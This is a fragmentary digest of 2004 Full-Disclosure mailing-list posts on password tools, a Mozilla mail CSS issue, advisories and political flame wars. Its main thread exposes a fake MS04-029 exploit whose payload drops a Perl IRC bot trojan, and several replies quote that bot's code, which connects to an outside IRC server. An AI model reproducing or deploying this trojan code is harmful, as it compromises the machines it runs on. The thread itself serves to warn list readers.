Dear Danny,
You can use Cain Abel (http://www.oxid.it).
--Wednesday, November 3, 2004, 1:03:42 AM, you wrote to [EMAIL PROTECTED]:
D After running: http://ntsecurity.nu/toolbox/pstoreview/
D ...there are a bunch of INETCOMM Server passwords I want to clear out.
D Any idea on how to complete
[EMAIL PROTECTED] wrote:
...How dangerous is this? What about possible CSS-exploits?
Workaround suggestions ;-)
- Cut your internet connection before reading any suspicious e-mails,
you can probably live without the CSS.
- turn off HTML in E-Mails (not possible in Mozilla?)
How about View, Message
-Messaggio originale-
Surprise!
with electronic vote win Bush,
so we've made a great scientific discover:
in information technology bits=bush :-)
Tiziano Radice
___
Full-Disclosure - We believe in it.
Charter:
Why if *Bush* gets back? And no, we don't really need to know the
answer. We have enough political nonsense going on already, just
something to ponder.
Btw: no.
patryn
n3td3v wrote:
Do you think if bush gets back in that hackers have something ready to
launch against internet targets?
Are
Hugo van der Kooij wrote:
Thank you all for turning a security mailinglist into a mudpool in which
throwing around dirt about political candidates has become the prime
objective.
However that was not my objective when I came to this list so it seems
this list has become rather useless to me.
Quite
[EMAIL PROTECTED] wrote:
Mozilla Mail 1.7.1 (W98) and 1.7.3 (W98) (didn't check different
versions) automatically load CSS-files which are linked from within an
html-page sent in an e-mail
Yes. There have been other ways to force an HTTP request from HTML mail
too (eg. background images, bug
This comes up about once a week now it seems. With apologies to the list
owners, who I think do a great job (you have any idea what a pain it is to
process this much email? I bet they do). I run a moderated subset of this
list (and several other lists). Yup, it's censored, and it's lagged since
Vulnerability-Microsoft ISA Server Authentication Bypassing
-NOT TRUE. IT IS NOT ISA problem.
You worked always with one instance of IExplore.exe which used same
pre-authenticated http channels for all calls from different windows or
processes. It might be seen as a problem only if IE COM IPC
[EMAIL PROTECTED] wrote:
- turn off HTML in E-Mails (not possible in Mozilla?)
View Message Body As Plain Text
--
Heikki Toivonen
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
people talking about politics are usually boring, thinking only about
themselves and what they can gain personally by doing politics
politics have nothing to do with thinking about the wellbeing of
people... only the RedCross, SalvationArmy, MSF etc do that
that's why those people like to mail
If you can't stand the heat, get out of the kitchen!
Cheers,
SkyLined
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
On Wed, 3 Nov 2004 11:32:40 +0300, 3APA3A [EMAIL PROTECTED] wrote:
Dear Danny,
You can use Cain Abel (http://www.oxid.it).
Hi 3APA3A,
Thank you for the tip. For this particular job, it does not display
all of the entries listed from pstoreview.exe, specifically the
INETCOMM Server
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200411-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
Now Australian and the US both have angry gnomes as the heads of state.
Flame me off list please
---
--- -Messaggio originale-
--- Surprise!
---
--- with electronic vote win Bush,
--- so we've made a great scientific discover:
--- in information technology bits=bush :-)
---
If you can't stand the heat, get out of the kitchen!
And btw: if you're not cooking, get the fuck out too!
Cheers,
SkyLined
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
so stop bitching... it's people like you and people like me who waste
their time sending the types of messages like this that piss everyone
off
if it didnt happen in the first place there would not be a problem
consider this next time you feel the need to inform us about leaving
the mailing
On Wed, 3 Nov 2004 09:56:31 -0500, Danny [EMAIL PROTECTED] wrote:
On Wed, 3 Nov 2004 11:32:40 +0300, 3APA3A [EMAIL PROTECTED] wrote:
Dear Danny,
You can use Cain Abel (http://www.oxid.it).
Hi 3APA3A,
Thank you for the tip. For this particular job, it does not display
all of the
Berend-Jan Wever wrote:
If you can't stand the heat, get out of the kitchen!
And btw: if you're not cooking, get the fuck out too!
Yeah - how hard is it to hit delete anyway?
(I don't think I've ever joined a mailing list expecting every post to
be interesting to me... nor even the
Thank you all for turning a security mailinglist into a mudpool in
which throwing around dirt about political candidates has become
the prime objective.
What we've seen on this list only serves to show how important this
election is to many people the world over, not just Americans.
The drama
Any other people who think has you should leave with
mailing list UNSUBSCRIBE function.
We dont need to know that you are leaving.
You say all but you are talking to some people
of this list.
There some useful posts and some that are'nt, usually
I simply read only useful posts.
Thats it, we
NOW go away!
May I ask: Who are you to tell people to go away?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
I'm Rick James bitch...
-KF
Cryptochrome wrote:
NOW go away!
May I ask: Who are you to tell people to go away?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for \Vulnerability in RPC Runtime Library\
* http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
* Tested Against:
* Windows 2000 (SP3 SP4)
* Windows XP (SP1 SP2)
* Windows NT4 (SP6a)
*
* EXPLOIT IS
The moderator/admin messed things up - I did not send this!
Heikki Toivonen wrote:
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for \Vulnerability in RPC Runtime Library\
* http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
* Tested Against:
* Windows
On Wed, 3 Nov 2004 20:31:44 +0100, Cryptochrome
[EMAIL PROTECTED] wrote:
NOW go away!
May I ask: Who are you to tell people to go away?
He's just repeating what his mom tells him to do everyday. You can't
blame him for that. ;-)
Thanks,
n3td3v
python /tmp/p.py
Cute.
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET-new($server.:6667)||exit;print
$sock USER k +i k :kv1\nNICK k\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Something/somebody is messing things up - I did not send this!
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for \Vulnerability in RPC Runtime Library\
* http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
* Tested Against:
* Windows 2000 (SP3 SP4)
*
Ahem, nice try.
http://neworder.box.sk/forum.php?did=multSecurity%20and%
20Networkingthread=206439
On Wednesday 03 November 2004 02:14 pm, Heikki Toivonen wrote:
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for \Vulnerability in RPC Runtime Library\
*
its a trojan...
[EMAIL PROTECTED]:~ strings /tmp/hi
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET-new($server.:6667)||exit;print
$sock USER k +i k :kv1\nNICK k\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Excellent exploit, I'm sure no one will spot that perl IRC bot in there,
nope no one will see that...
(hint for the readers, try looking at the ascii out put of the char
*shellcode_payload= data, looks a little like the following)
[code]
#!/usr/bin/perl
$c
han=#0x;$nick=k
;$server=ir3ip.n
Interesting /tmp/hi file.
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET-new($server.:6667)||exit;print
$sock USER k +i k :kv1\nNICK
k\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Do i need too say more :D
You sure do, like for example, explain the following in your code and
why it makes /tmp/hi (/var/tmp/hi) and then executes it and it contains
this code
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit if fork;use
IO::Soc
ket;$sock =
Who are you to question him about whom he can question? LOL Can't we all
just get along?
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
David Maynor
Sent: Wednesday, November 03, 2004 2:36 PM
To: Cryptochrome
Cc: KF_lists; [EMAIL PROTECTED]
This thread is more f**ked up than the U.S election.
Thanks,
n3td3v
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Zip/Linux long path buffer overflow
Classification:
===
Level: low-[MED]-high-crit
ID: HEXVIEW*2004*11*03*1
URL: http://www.hexview.com/docs/20041103-1.txt
Overview:
=
Zip console application by Info-Zip (http://www.info-zip.org
On Fri, 2004-10-29 at 21:48 +, Author Travis wrote:
* By releasing the information publicly, we hope to increase tips to law
enforcement concerning the Sobig authorship and spur efforts toward
apprehension of the malware author(s);
Ruslan Ibragimov, the Russian developer claimed by
On Fri, 2004-10-29 at 21:48 +, Author Travis wrote:
* By releasing the information publicly, we hope to increase tips to
law
enforcement concerning the Sobig authorship and spur efforts toward
apprehension of the malware author(s);
Ruslan Ibragimov, the Russian developer claimed by
Anyone compiled and tested this yet ?
Thanks
Raz
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Hi All,
I have major issues with the quality of Norton AntiVirus. For some
history, see:
http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html
- Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)
http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html
- Norton
Yep, Dave pointed that out really fast...
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Barrie Dempster
Sent: Wednesday, November 03, 2004 3:19 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of PerlTidy.
#!/usr/bin/perl
$chan = #0x;
$nick = k;
$server= ir3ip.net;
$SIG{TERM} = {};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET-new( $server . :6667 ) || exit;
print $sock USER k +i k :kv1\nNICK
Hello, Andrew Clover!
Should be possible - it is in Thunderbird (View-Message Body as-Plain
Text) and I highly recommend doing so.
Maybe
View- Message Body as- Simple HTML
is enough?
This option allows only very strict subset of HTML tags and attributes
but saves HTML layout. You may also
On Tue, 2 Nov 2004, Gary E. Miller wrote:
[SNIP]
I guess I mostly agree. PHP is usually bolted into the running Apache
and so can add problems by just being there. This is NOT always the
case. Debian by default installs it as a standalone module that is only
called if a .php file
43 matches
Mail list logo